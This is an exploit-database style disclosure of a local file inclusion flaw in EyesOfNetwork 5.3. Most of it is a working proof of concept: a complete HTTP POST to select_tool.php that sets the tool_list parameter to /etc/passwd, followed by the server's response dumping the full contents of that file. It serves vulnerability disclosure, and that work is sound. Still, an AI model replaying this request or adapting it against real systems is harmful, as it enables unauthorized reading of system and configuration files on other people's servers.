EyesOfNetwork 5.3 Local File Inclusion

EyesOfNetwork version 5.3 suffers from a local file inclusion vulnerability.


MD5 | 88fd5acc1e0c31de7e01d0c3cfd29bc1

# Exploit Title: EyesOfNetwork 5.3 - LFI
# Date: 10/01/2021
# Exploit Author: Audencia Business SCHOOL Red Team
# Vendor Homepage: https://www.eyesofnetwork.com/en
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3

The php not exclude other tools than proposed one. It's possible possible to include files when the parameter "tool_list=" is modified like that :

==================================================================
POST /module/tool_all/select_tool.php HTTP/1.1
Host: 192.168.0.26
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 209
Origin: https://192.168.0.26
Connection: close
Referer: https://192.168.0.26/module/tool_all/
Cookie: session_id=746751013; user_name=admin; user_id=1; user_limitation=0; group_id=1

(tool_list=FILE TO READ)
page=bylistbox&host_list=127.0.0.1&tool_list=/etc/passwd&snmp_com=aze&snmp_version=2c&min_port=1&max_port=1024&username=&password=&snmp_auth_protocol=MD5&snmp_priv_passphrase=&snmp_priv_protocol=&snmp_context=

==================================================================


Result a printed /etc/passwd document in the webpage :

==================================================================

HTTP/1.1 200 OK
Date: Sat, 09 Jan 2021 01:16:21 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3
X-Powered-By: PHP/5.4.16
Content-Length: 1529
Connection: close
Content-Type: text/html; charset=UTF-8

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nagios:x:999:991::/var/spool/nagios:/sbin/nologin
influxdb:x:998:998::/var/lib/influxdb:/bin/false
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
grafana:x:997:995:grafana user:/usr/share/grafana:/sbin/nologin
polkitd:x:996:994:User for polkitd:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
snmptt:x:995:992:SNMP Trap Translator:/var/spool/snmptt:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:994:990::/var/lib/chrony:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
cacti:x:1000:991::/home/cacti:/bin/bash
eon4apps:x:1001:991::/srv/eyesofnetwork/eon4apps:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
admin:x:1002:1000:admin:/home/admin:/bin/bash

==================================================================

Related Posts